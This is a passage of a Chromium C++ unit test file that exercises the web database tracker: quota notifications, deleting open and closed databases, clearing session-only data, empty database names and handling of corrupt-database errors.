    registered_client_ = client;
  }

  void NotifyStorageAccessed(storage::QuotaClient::ID client_id,
                             const GURL& origin,
                             storage::StorageType type) override {
    EXPECT_EQ(storage::QuotaClient::kDatabase, client_id);
    EXPECT_EQ(storage::kStorageTypeTemporary, type);
    accesses_[origin] += 1;
  }

  void NotifyStorageModified(storage::QuotaClient::ID client_id,
                             const GURL& origin,
                             storage::StorageType type,
                             int64_t delta) override {
    EXPECT_EQ(storage::QuotaClient::kDatabase, client_id);
    EXPECT_EQ(storage::kStorageTypeTemporary, type);
    modifications_[origin].first += 1;
    modifications_[origin].second += delta;
  }

  // Not needed for our tests.
  void NotifyOriginInUse(const GURL& origin) override {}
  void NotifyOriginNoLongerInUse(const GURL& origin) override {}
  void SetUsageCacheEnabled(storage::QuotaClient::ID client_id,
                            const GURL& origin,
                            storage::StorageType type,
                            bool enabled) override {}
  void GetUsageAndQuota(base::SequencedTaskRunner* original_task_runner,
                        const GURL& origin,
                        storage::StorageType type,
                        const GetUsageAndQuotaCallback& callback) override {}

  // Tells the registered client the quota manager is gone; must run before
  // destruction so the destructor's expectation holds.
  void SimulateQuotaManagerDestroyed() {
    if (registered_client_) {
      registered_client_->OnQuotaManagerDestroyed();
      registered_client_ = nullptr;
    }
  }

  bool WasAccessNotified(const GURL& origin) {
    return accesses_[origin] != 0;
  }

  bool WasModificationNotified(const GURL& origin, int64_t amount) {
    return modifications_[origin].first != 0 &&
           modifications_[origin].second == amount;
  }

  void reset() {
    accesses_.clear();
    modifications_.clear();
  }

  storage::QuotaClient* registered_client_;

  // Map from origin to count of access notifications.
  std::map<GURL, int> accesses_;

  // Map from origin to <count, sum of deltas>
  std::map<GURL, std::pair<int, int64_t>> modifications_;

 protected:
  ~TestQuotaManagerProxy() override { EXPECT_FALSE(registered_client_); }
};
// Creates (or opens) |file_path| and truncates/extends it to |length| bytes.
// Returns false if the file cannot be opened or resized.
bool EnsureFileOfSize(const base::FilePath& file_path, int64_t length) {
  base::File file(file_path,
                  base::File::FLAG_OPEN_ALWAYS | base::File::FLAG_WRITE);
  return file.IsValid() && file.SetLength(length);
}
} // namespace
namespace content {
// We declare a helper class, and make it a friend of DatabaseTracker using
// the FORWARD_DECLARE_TEST macro, and we implement all tests we want to run as
// static methods of this class. Then we make our TEST() targets call these
// static functions. This allows us to run each test in normal mode and
// incognito mode without writing the same code twice.
class DatabaseTracker_TestHelper_Test {
public:
static void TestDeleteOpenDatabase(bool incognito_mode) {
// Initialize the tracker database.
base::ScopedTempDir temp_dir;
ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
scoped_refptr<MockSpecialStoragePolicy> special_storage_policy =
new MockSpecialStoragePolicy;
special_storage_policy->AddProtected(GURL(kOrigin2Url));
scoped_refptr<DatabaseTracker> tracker(
new DatabaseTracker(temp_dir.GetPath(), incognito_mode,
special_storage_policy.get(), NULL, NULL));
// Create and open three databases.
int64_t database_size = 0;
const std::string kOrigin1 =
storage::GetIdentifierFromOrigin(GURL(kOrigin1Url));
const std::string kOrigin2 =
storage::GetIdentifierFromOrigin(GURL(kOrigin2Url));
const base::string16 kDB1 = ASCIIToUTF16("db1");
const base::string16 kDB2 = ASCIIToUTF16("db2");
const base::string16 kDB3 = ASCIIToUTF16("db3");
const base::string16 kDescription = ASCIIToUTF16("database_description");
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
tracker->DatabaseOpened(kOrigin2, kDB2, kDescription, 0,
&database_size);
tracker->DatabaseOpened(kOrigin2, kDB3, kDescription, 0,
&database_size);
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin1)))));
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin2)))));
EXPECT_EQ(1, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin1, kDB1), "a", 1));
EXPECT_EQ(2, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin2, kDB2), "aa", 2));
EXPECT_EQ(3, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin2, kDB3), "aaa", 3));
tracker->DatabaseModified(kOrigin1, kDB1);
tracker->DatabaseModified(kOrigin2, kDB2);
tracker->DatabaseModified(kOrigin2, kDB3);
// Delete db1. Should also delete origin1.
TestObserver observer;
tracker->AddObserver(&observer);
net::TestCompletionCallback callback;
int result = tracker->DeleteDatabase(kOrigin1, kDB1, callback.callback());
EXPECT_EQ(net::ERR_IO_PENDING, result);
ASSERT_FALSE(callback.have_result());
EXPECT_TRUE(observer.DidReceiveNewNotification());
EXPECT_EQ(kOrigin1, observer.GetNotificationOriginIdentifier());
EXPECT_EQ(kDB1, observer.GetNotificationDatabaseName());
tracker->DatabaseClosed(kOrigin1, kDB1);
result = callback.GetResult(result);
EXPECT_EQ(net::OK, result);
EXPECT_FALSE(base::PathExists(
tracker->DatabaseDirectory().AppendASCII(kOrigin1)));
// Recreate db1.
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin1)))));
EXPECT_EQ(1, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin1, kDB1), "a", 1));
tracker->DatabaseModified(kOrigin1, kDB1);
// Setup file modification times. db1 and db2 are modified now, db3 three
// days ago.
base::Time now = base::Time::Now();
EXPECT_TRUE(base::TouchFile(tracker->GetFullDBFilePath(kOrigin1, kDB1),
now, now));
EXPECT_TRUE(base::TouchFile(tracker->GetFullDBFilePath(kOrigin2, kDB2),
now, now));
base::Time three_days_ago = now - base::TimeDelta::FromDays(3);
EXPECT_TRUE(base::TouchFile(tracker->GetFullDBFilePath(kOrigin2, kDB3),
three_days_ago, three_days_ago));
// Delete databases modified since yesterday. db2 is whitelisted.
base::Time yesterday = base::Time::Now();
yesterday -= base::TimeDelta::FromDays(1);
result = tracker->DeleteDataModifiedSince(
yesterday, callback.callback());
EXPECT_EQ(net::ERR_IO_PENDING, result);
ASSERT_FALSE(callback.have_result());
EXPECT_TRUE(observer.DidReceiveNewNotification());
tracker->DatabaseClosed(kOrigin1, kDB1);
tracker->DatabaseClosed(kOrigin2, kDB2);
result = callback.GetResult(result);
EXPECT_EQ(net::OK, result);
EXPECT_FALSE(base::PathExists(
tracker->DatabaseDirectory().AppendASCII(kOrigin1)));
EXPECT_TRUE(
base::PathExists(tracker->GetFullDBFilePath(kOrigin2, kDB2)));
EXPECT_TRUE(
base::PathExists(tracker->GetFullDBFilePath(kOrigin2, kDB3)));
tracker->DatabaseClosed(kOrigin2, kDB3);
tracker->RemoveObserver(&observer);
}
static void TestDatabaseTracker(bool incognito_mode) {
// Initialize the tracker database.
base::ScopedTempDir temp_dir;
ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
scoped_refptr<MockSpecialStoragePolicy> special_storage_policy =
new MockSpecialStoragePolicy;
special_storage_policy->AddProtected(GURL(kOrigin2Url));
scoped_refptr<DatabaseTracker> tracker(
new DatabaseTracker(temp_dir.GetPath(), incognito_mode,
special_storage_policy.get(), NULL, NULL));
// Add two observers.
TestObserver observer1;
TestObserver observer2;
tracker->AddObserver(&observer1);
tracker->AddObserver(&observer2);
// Open three new databases.
int64_t database_size = 0;
const std::string kOrigin1 =
storage::GetIdentifierFromOrigin(GURL(kOrigin1Url));
const std::string kOrigin2 =
storage::GetIdentifierFromOrigin(GURL(kOrigin2Url));
const base::string16 kDB1 = ASCIIToUTF16("db1");
const base::string16 kDB2 = ASCIIToUTF16("db2");
const base::string16 kDB3 = ASCIIToUTF16("db3");
const base::string16 kDescription = ASCIIToUTF16("database_description");
// Get the info for kOrigin1 and kOrigin2
DatabaseTracker::CachedOriginInfo* origin1_info =
tracker->GetCachedOriginInfo(kOrigin1);
DatabaseTracker::CachedOriginInfo* origin2_info =
tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_TRUE(origin2_info);
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
tracker->DatabaseOpened(kOrigin2, kDB2, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
tracker->DatabaseOpened(kOrigin1, kDB3, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
// Write some data to each file and check that the listeners are
// called with the appropriate values.
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin1)))));
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin2)))));
EXPECT_EQ(1, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin1, kDB1), "a", 1));
EXPECT_EQ(2, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin2, kDB2), "aa", 2));
EXPECT_EQ(4, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin1, kDB3), "aaaa", 4));
tracker->DatabaseModified(kOrigin1, kDB1);
CheckNotificationReceived(&observer1, kOrigin1, kDB1, 1);
CheckNotificationReceived(&observer2, kOrigin1, kDB1, 1);
tracker->DatabaseModified(kOrigin2, kDB2);
CheckNotificationReceived(&observer1, kOrigin2, kDB2, 2);
CheckNotificationReceived(&observer2, kOrigin2, kDB2, 2);
tracker->DatabaseModified(kOrigin1, kDB3);
CheckNotificationReceived(&observer1, kOrigin1, kDB3, 4);
CheckNotificationReceived(&observer2, kOrigin1, kDB3, 4);
// Close all databases
tracker->DatabaseClosed(kOrigin1, kDB1);
tracker->DatabaseClosed(kOrigin2, kDB2);
tracker->DatabaseClosed(kOrigin1, kDB3);
// Open an existing database and check the reported size
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_EQ(1, database_size);
tracker->DatabaseClosed(kOrigin1, kDB1);
// Remove an observer; this should clear all caches.
tracker->RemoveObserver(&observer2);
// Close the tracker database and clear all caches.
// Then make sure that DatabaseOpened() still returns the correct result.
tracker->CloseTrackerDatabaseAndClearCaches();
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_EQ(1, database_size);
tracker->DatabaseClosed(kOrigin1, kDB1);
// Remove all observers.
tracker->RemoveObserver(&observer1);
// Trying to delete a database in use should fail
tracker->DatabaseOpened(kOrigin1, kDB3, kDescription, 0,
&database_size);
EXPECT_FALSE(tracker->DeleteClosedDatabase(kOrigin1, kDB3));
origin1_info = tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_EQ(4, origin1_info->GetDatabaseSize(kDB3));
tracker->DatabaseClosed(kOrigin1, kDB3);
// Delete a database and make sure the space used by that origin is updated
EXPECT_TRUE(tracker->DeleteClosedDatabase(kOrigin1, kDB3));
origin1_info = tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_EQ(1, origin1_info->GetDatabaseSize(kDB1));
EXPECT_EQ(0, origin1_info->GetDatabaseSize(kDB3));
// Get all data for all origins
std::vector<OriginInfo> origins_info;
EXPECT_TRUE(tracker->GetAllOriginsInfo(&origins_info));
EXPECT_EQ(size_t(2), origins_info.size());
EXPECT_EQ(kOrigin1, origins_info[0].GetOriginIdentifier());
EXPECT_EQ(1, origins_info[0].TotalSize());
EXPECT_EQ(1, origins_info[0].GetDatabaseSize(kDB1));
EXPECT_EQ(0, origins_info[0].GetDatabaseSize(kDB3));
EXPECT_EQ(kOrigin2, origins_info[1].GetOriginIdentifier());
EXPECT_EQ(2, origins_info[1].TotalSize());
// Trying to delete an origin with databases in use should fail
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_FALSE(tracker->DeleteOrigin(kOrigin1, false));
origin1_info = tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_EQ(1, origin1_info->GetDatabaseSize(kDB1));
tracker->DatabaseClosed(kOrigin1, kDB1);
// Delete an origin that doesn't have any database in use
EXPECT_TRUE(tracker->DeleteOrigin(kOrigin1, false));
origins_info.clear();
EXPECT_TRUE(tracker->GetAllOriginsInfo(&origins_info));
EXPECT_EQ(size_t(1), origins_info.size());
EXPECT_EQ(kOrigin2, origins_info[0].GetOriginIdentifier());
origin1_info = tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_EQ(0, origin1_info->TotalSize());
}
// Exercises DatabaseTracker's integration with the quota system: every
// open/close must notify the TestQuotaManagerProxy of origin access, and
// every size change (modification, deletion, crash cleanup) must be
// reported as the correct byte delta.
static void DatabaseTrackerQuotaIntegration() {
  const GURL kOrigin(kOrigin1Url);
  const std::string kOriginId = storage::GetIdentifierFromOrigin(kOrigin);
  const base::string16 kName = ASCIIToUTF16("name");
  const base::string16 kDescription = ASCIIToUTF16("description");

  base::ScopedTempDir temp_dir;
  ASSERT_TRUE(temp_dir.CreateUniqueTempDir());

  // Initialize the tracker with a QuotaManagerProxy so the test double can
  // observe the notifications.
  scoped_refptr<TestQuotaManagerProxy> test_quota_proxy(
      new TestQuotaManagerProxy);
  scoped_refptr<DatabaseTracker> tracker(
      new DatabaseTracker(temp_dir.GetPath(), false /* incognito */, NULL,
                          test_quota_proxy.get(), NULL));
  EXPECT_TRUE(test_quota_proxy->registered_client_);

  // Create a database and modify it a couple of times, close it,
  // then delete it. Observe the tracker notifies accordingly.
  int64_t database_size = 0;
  tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
                          &database_size);
  EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
  test_quota_proxy->reset();
  base::FilePath db_file(tracker->GetFullDBFilePath(kOriginId, kName));
  EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
  EXPECT_TRUE(EnsureFileOfSize(db_file, 10));
  tracker->DatabaseModified(kOriginId, kName);
  // First modification reports the full 10 bytes.
  EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, 10));
  test_quota_proxy->reset();
  EXPECT_TRUE(EnsureFileOfSize(db_file, 100));
  tracker->DatabaseModified(kOriginId, kName);
  // Growth from 10 to 100 bytes is reported as a delta of 90.
  EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, 90));
  test_quota_proxy->reset();
  tracker->DatabaseClosed(kOriginId, kName);
  EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
  // Deleting a closed database completes synchronously (net::OK) and the
  // freed 100 bytes show up as a negative delta.
  EXPECT_EQ(net::OK, tracker->DeleteDatabase(
      kOriginId, kName, net::CompletionCallback()));
  EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, -100));
  test_quota_proxy->reset();

  // Create a database and modify it, try to delete it while open,
  // then close it (at which time deletion will actually occur).
  // Observe the tracker notifies accordingly.
  tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
                          &database_size);
  EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
  test_quota_proxy->reset();
  db_file = tracker->GetFullDBFilePath(kOriginId, kName);
  EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
  EXPECT_TRUE(EnsureFileOfSize(db_file, 100));
  tracker->DatabaseModified(kOriginId, kName);
  EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, 100));
  test_quota_proxy->reset();
  // Deletion is pending while a connection is still open, so no size
  // delta may be reported yet...
  EXPECT_EQ(net::ERR_IO_PENDING,
            tracker->DeleteDatabase(kOriginId, kName,
                                    net::CompletionCallback()));
  EXPECT_FALSE(test_quota_proxy->WasModificationNotified(kOrigin, -100));
  // ...and the -100 delta arrives once the last connection closes.
  tracker->DatabaseClosed(kOriginId, kName);
  EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
  EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, -100));
  test_quota_proxy->reset();

  // Create a database and up the file size without telling
  // the tracker about the modification, then simulate a
  // renderer crash.
  // Observe the tracker notifies accordingly.
  tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
                          &database_size);
  EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
  test_quota_proxy->reset();
  db_file = tracker->GetFullDBFilePath(kOriginId, kName);
  EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
  EXPECT_TRUE(EnsureFileOfSize(db_file, 100));
  DatabaseConnections crashed_renderer_connections;
  crashed_renderer_connections.AddConnection(kOriginId, kName);
  EXPECT_FALSE(test_quota_proxy->WasModificationNotified(kOrigin, 100));
  // Closing the crashed renderer's connections flushes the unreported
  // size change to the quota system.
  tracker->CloseDatabases(crashed_renderer_connections);
  EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, 100));

  // Cleanup.
  crashed_renderer_connections.RemoveAllConnections();
  test_quota_proxy->SimulateQuotaManagerDestroyed();
}
// Verifies that at Shutdown() the tracker deletes databases belonging to
// origins the special storage policy marks session-only, while databases of
// other origins survive a tracker restart.
static void DatabaseTrackerClearSessionOnlyDatabasesOnExit() {
  int64_t database_size = 0;
  const std::string kOrigin1 =
      storage::GetIdentifierFromOrigin(GURL(kOrigin1Url));
  const std::string kOrigin2 =
      storage::GetIdentifierFromOrigin(GURL(kOrigin2Url));
  const base::string16 kDB1 = ASCIIToUTF16("db1");
  const base::string16 kDB2 = ASCIIToUTF16("db2");
  const base::string16 kDescription = ASCIIToUTF16("database_description");

  // Initialize the tracker database.
  base::MessageLoop message_loop;
  base::ScopedTempDir temp_dir;
  ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
  base::FilePath origin1_db_dir;
  base::FilePath origin2_db_dir;
  {
    // Only kOrigin2 is marked session-only.
    scoped_refptr<MockSpecialStoragePolicy> special_storage_policy =
        new MockSpecialStoragePolicy;
    special_storage_policy->AddSessionOnly(GURL(kOrigin2Url));
    scoped_refptr<DatabaseTracker> tracker(new DatabaseTracker(
        temp_dir.GetPath(), false, special_storage_policy.get(), NULL,
        base::ThreadTaskRunnerHandle::Get().get()));
    // Open two new databases.
    tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
                            &database_size);
    EXPECT_EQ(0, database_size);
    tracker->DatabaseOpened(kOrigin2, kDB2, kDescription, 0,
                            &database_size);
    EXPECT_EQ(0, database_size);
    // Write some data to each file.
    base::FilePath db_file;
    db_file = tracker->GetFullDBFilePath(kOrigin1, kDB1);
    EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
    EXPECT_TRUE(EnsureFileOfSize(db_file, 1));
    db_file = tracker->GetFullDBFilePath(kOrigin2, kDB2);
    EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
    EXPECT_TRUE(EnsureFileOfSize(db_file, 2));
    // Store the origin database directories as long as they still exist,
    // so their (non-)existence can be checked after shutdown.
    origin1_db_dir = tracker->GetFullDBFilePath(kOrigin1, kDB1).DirName();
    origin2_db_dir = tracker->GetFullDBFilePath(kOrigin2, kDB2).DirName();
    tracker->DatabaseModified(kOrigin1, kDB1);
    tracker->DatabaseModified(kOrigin2, kDB2);
    // Close all databases.
    tracker->DatabaseClosed(kOrigin1, kDB1);
    tracker->DatabaseClosed(kOrigin2, kDB2);
    // Shutdown() is what triggers deletion of session-only data.
    tracker->Shutdown();
  }

  // At this point, the database tracker should be gone. Create a new one.
  scoped_refptr<DatabaseTracker> tracker(
      new DatabaseTracker(temp_dir.GetPath(), false, NULL, NULL, NULL));
  // Get all data for all origins.
  std::vector<OriginInfo> origins_info;
  EXPECT_TRUE(tracker->GetAllOriginsInfo(&origins_info));
  // kOrigin1 was not session-only, so it survived. kOrigin2 was session-only
  // and it got deleted.
  EXPECT_EQ(size_t(1), origins_info.size());
  EXPECT_EQ(kOrigin1, origins_info[0].GetOriginIdentifier());
  EXPECT_TRUE(
      base::PathExists(tracker->GetFullDBFilePath(kOrigin1, kDB1)));
  EXPECT_EQ(base::FilePath(), tracker->GetFullDBFilePath(kOrigin2, kDB2));
  // The origin directory of kOrigin1 remains, but the origin directory of
  // kOrigin2 is deleted.
  EXPECT_TRUE(base::PathExists(origin1_db_dir));
  EXPECT_FALSE(base::PathExists(origin2_db_dir));
}
// Counterpart to the session-only test above: SetForceKeepSessionState()
// must suppress the session-only wipe, so even kOrigin2 (marked
// session-only) survives Shutdown() and the tracker restart.
static void DatabaseTrackerSetForceKeepSessionState() {
  int64_t database_size = 0;
  const std::string kOrigin1 =
      storage::GetIdentifierFromOrigin(GURL(kOrigin1Url));
  const std::string kOrigin2 =
      storage::GetIdentifierFromOrigin(GURL(kOrigin2Url));
  const base::string16 kDB1 = ASCIIToUTF16("db1");
  const base::string16 kDB2 = ASCIIToUTF16("db2");
  const base::string16 kDescription = ASCIIToUTF16("database_description");

  // Initialize the tracker database.
  base::MessageLoop message_loop;
  base::ScopedTempDir temp_dir;
  ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
  base::FilePath origin1_db_dir;
  base::FilePath origin2_db_dir;
  {
    // kOrigin2 is session-only, but the force-keep flag below overrides it.
    scoped_refptr<MockSpecialStoragePolicy> special_storage_policy =
        new MockSpecialStoragePolicy;
    special_storage_policy->AddSessionOnly(GURL(kOrigin2Url));
    scoped_refptr<DatabaseTracker> tracker(new DatabaseTracker(
        temp_dir.GetPath(), false, special_storage_policy.get(), NULL,
        base::ThreadTaskRunnerHandle::Get().get()));
    tracker->SetForceKeepSessionState();
    // Open two new databases.
    tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
                            &database_size);
    EXPECT_EQ(0, database_size);
    tracker->DatabaseOpened(kOrigin2, kDB2, kDescription, 0,
                            &database_size);
    EXPECT_EQ(0, database_size);
    // Write some data to each file.
    base::FilePath db_file;
    db_file = tracker->GetFullDBFilePath(kOrigin1, kDB1);
    EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
    EXPECT_TRUE(EnsureFileOfSize(db_file, 1));
    db_file = tracker->GetFullDBFilePath(kOrigin2, kDB2);
    EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
    EXPECT_TRUE(EnsureFileOfSize(db_file, 2));
    // Store the origin database directories as long as they still exist.
    origin1_db_dir = tracker->GetFullDBFilePath(kOrigin1, kDB1).DirName();
    origin2_db_dir = tracker->GetFullDBFilePath(kOrigin2, kDB2).DirName();
    tracker->DatabaseModified(kOrigin1, kDB1);
    tracker->DatabaseModified(kOrigin2, kDB2);
    // Close all databases.
    tracker->DatabaseClosed(kOrigin1, kDB1);
    tracker->DatabaseClosed(kOrigin2, kDB2);
    tracker->Shutdown();
  }

  // At this point, the database tracker should be gone. Create a new one.
  scoped_refptr<DatabaseTracker> tracker(
      new DatabaseTracker(temp_dir.GetPath(), false, NULL, NULL, NULL));
  // Get all data for all origins.
  std::vector<OriginInfo> origins_info;
  EXPECT_TRUE(tracker->GetAllOriginsInfo(&origins_info));
  // No origins were deleted.
  EXPECT_EQ(size_t(2), origins_info.size());
  EXPECT_TRUE(
      base::PathExists(tracker->GetFullDBFilePath(kOrigin1, kDB1)));
  EXPECT_TRUE(
      base::PathExists(tracker->GetFullDBFilePath(kOrigin2, kDB2)));
  EXPECT_TRUE(base::PathExists(origin1_db_dir));
  EXPECT_TRUE(base::PathExists(origin2_db_dir));
}
// An empty string is a legal database name: it can be opened, tracked,
// given a description, re-described on reopen, and deleted.
static void EmptyDatabaseNameIsValid() {
  const GURL kOrigin(kOrigin1Url);
  const std::string kOriginId = storage::GetIdentifierFromOrigin(kOrigin);
  const base::string16 kEmptyName;
  const base::string16 kDescription(ASCIIToUTF16("description"));
  const base::string16 kChangedDescription(
      ASCIIToUTF16("changed_description"));

  // Initialize a tracker database, no need to put it on disk.
  const bool kUseInMemoryTrackerDatabase = true;
  base::ScopedTempDir temp_dir;
  ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
  scoped_refptr<DatabaseTracker> tracker(new DatabaseTracker(
      temp_dir.GetPath(), kUseInMemoryTrackerDatabase, NULL, NULL, NULL));

  // Starts off with no databases.
  std::vector<OriginInfo> infos;
  EXPECT_TRUE(tracker->GetAllOriginsInfo(&infos));
  EXPECT_TRUE(infos.empty());

  // Create a db with an empty name.
  int64_t database_size = -1;
  tracker->DatabaseOpened(kOriginId, kEmptyName, kDescription, 0,
                          &database_size);
  EXPECT_EQ(0, database_size);
  tracker->DatabaseModified(kOriginId, kEmptyName);
  EXPECT_TRUE(tracker->GetAllOriginsInfo(&infos));
  EXPECT_EQ(1u, infos.size());
  EXPECT_EQ(kDescription, infos[0].GetDatabaseDescription(kEmptyName));
  EXPECT_FALSE(tracker->GetFullDBFilePath(kOriginId, kEmptyName).empty());
  // Reopening with a different description updates the stored description.
  tracker->DatabaseOpened(kOriginId, kEmptyName, kChangedDescription, 0,
                          &database_size);
  infos.clear();
  EXPECT_TRUE(tracker->GetAllOriginsInfo(&infos));
  EXPECT_EQ(1u, infos.size());
  EXPECT_EQ(kChangedDescription, infos[0].GetDatabaseDescription(kEmptyName));
  // Two opens require two closes.
  tracker->DatabaseClosed(kOriginId, kEmptyName);
  tracker->DatabaseClosed(kOriginId, kEmptyName);

  // Deleting it should return to the initial state.
  EXPECT_EQ(net::OK, tracker->DeleteDatabase(kOriginId, kEmptyName,
                                             net::CompletionCallback()));
  infos.clear();
  EXPECT_TRUE(tracker->GetAllOriginsInfo(&infos));
  EXPECT_TRUE(infos.empty());
}
// Exercises HandleSqliteError(): a SQLITE_CORRUPT report schedules an open
// database for deletion (actually deleted when the last connection closes),
// deletes a closed database immediately, and is a no-op for non-errors or
// unknown databases.
static void HandleSqliteError() {
  const GURL kOrigin(kOrigin1Url);
  const std::string kOriginId = storage::GetIdentifierFromOrigin(kOrigin);
  const base::string16 kName(ASCIIToUTF16("name"));
  const base::string16 kDescription(ASCIIToUTF16("description"));

  // Initialize a tracker database, no need to put it on disk.
  const bool kUseInMemoryTrackerDatabase = true;
  base::ScopedTempDir temp_dir;
  ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
  scoped_refptr<DatabaseTracker> tracker(new DatabaseTracker(
      temp_dir.GetPath(), kUseInMemoryTrackerDatabase, NULL, NULL, NULL));

  // Setup to observe OnScheduledForDelete notifications.
  TestObserver observer(false, true);
  tracker->AddObserver(&observer);

  // Verify it does no harm when there is no such database.
  tracker->HandleSqliteError(kOriginId, kName, SQLITE_CORRUPT);
  EXPECT_FALSE(tracker->IsDatabaseScheduledForDeletion(kOriginId, kName));
  EXPECT_FALSE(observer.DidReceiveNewNotification());

  // --------------------------------------------------------
  // Create a record of a database in the tracker db and create
  // a spoof_db_file on disk in the expected location.
  int64_t database_size = 0;
  tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
                          &database_size);
  base::FilePath spoof_db_file = tracker->GetFullDBFilePath(kOriginId, kName);
  EXPECT_FALSE(tracker->GetFullDBFilePath(kOriginId, kName).empty());
  EXPECT_TRUE(base::CreateDirectory(spoof_db_file.DirName()));
  EXPECT_TRUE(EnsureFileOfSize(spoof_db_file, 1));

  // Verify it does no harm when a non-error code is reported.
  tracker->HandleSqliteError(kOriginId, kName, SQLITE_OK);
  EXPECT_FALSE(tracker->IsDatabaseScheduledForDeletion(kOriginId, kName));
  EXPECT_FALSE(observer.DidReceiveNewNotification());

  // Verify that with a connection open, the db is scheduled for deletion,
  // but that the file still exists.
  tracker->HandleSqliteError(kOriginId, kName, SQLITE_CORRUPT);
  EXPECT_TRUE(tracker->IsDatabaseScheduledForDeletion(kOriginId, kName));
  EXPECT_TRUE(observer.DidReceiveNewNotification());
  EXPECT_TRUE(base::PathExists(spoof_db_file));

  // Verify that once closed, the file is deleted and the record in the
  // tracker db is removed.
  tracker->DatabaseClosed(kOriginId, kName);
  EXPECT_FALSE(base::PathExists(spoof_db_file));
  EXPECT_TRUE(tracker->GetFullDBFilePath(kOriginId, kName).empty());

  // --------------------------------------------------------
  // Create another record of a database in the tracker db and create
  // a spoof_db_file on disk in the expected location.
  tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
                          &database_size);
  base::FilePath spoof_db_file2 = tracker->GetFullDBFilePath(kOriginId,
                                                             kName);
  EXPECT_FALSE(tracker->GetFullDBFilePath(kOriginId, kName).empty());
  // A fresh path is issued for the recreated database.
  EXPECT_NE(spoof_db_file, spoof_db_file2);
  EXPECT_TRUE(base::CreateDirectory(spoof_db_file2.DirName()));
  EXPECT_TRUE(EnsureFileOfSize(spoof_db_file2, 1));

  // Verify that with no connection open, the db is deleted immediately.
  tracker->DatabaseClosed(kOriginId, kName);
  tracker->HandleSqliteError(kOriginId, kName, SQLITE_CORRUPT);
  EXPECT_FALSE(tracker->IsDatabaseScheduledForDeletion(kOriginId, kName));
  EXPECT_FALSE(observer.DidReceiveNewNotification());
  EXPECT_TRUE(tracker->GetFullDBFilePath(kOriginId, kName).empty());
  EXPECT_FALSE(base::PathExists(spoof_db_file2));

  tracker->RemoveObserver(&observer);
}
};
// Each TEST below is a thin dispatcher into DatabaseTracker_TestHelper_Test,
// whose static helpers hold the actual test logic -- presumably so they can
// access DatabaseTracker internals via a friend declaration (confirm against
// the tracker's header).
TEST(DatabaseTrackerTest, DeleteOpenDatabase) {
  DatabaseTracker_TestHelper_Test::TestDeleteOpenDatabase(false);
}
TEST(DatabaseTrackerTest, DeleteOpenDatabaseIncognitoMode) {
  DatabaseTracker_TestHelper_Test::TestDeleteOpenDatabase(true);
}
TEST(DatabaseTrackerTest, DatabaseTracker) {
  DatabaseTracker_TestHelper_Test::TestDatabaseTracker(false);
}
